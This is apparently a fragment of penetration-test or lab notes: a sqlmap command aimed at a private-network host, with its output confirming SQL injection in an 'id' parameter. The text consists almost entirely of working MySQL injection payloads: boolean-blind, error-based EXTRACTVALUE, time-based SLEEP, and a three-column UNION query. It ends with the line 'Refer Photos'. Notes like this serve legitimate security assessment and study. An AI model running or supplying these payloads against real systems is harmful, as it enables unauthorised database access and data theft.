sqlmap -u http://10.1.8.30/?id=id 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=id AND 9767=9767

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=id AND EXTRACTVALUE(1094,CONCAT(0x5c,0x71716b6a71,(SELECT (ELT(1094=1094,1))),0x7170716a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=id AND (SELECT 5146 FROM (SELECT(SLEEP(5)))oIjP)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6619 UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6a71,0x6146456f5442667a7a5670706457666f5a7352706e784c596f566d517a7a7441734f67746c6e5743,0x7170716a71)-- -
---

Refer Photos
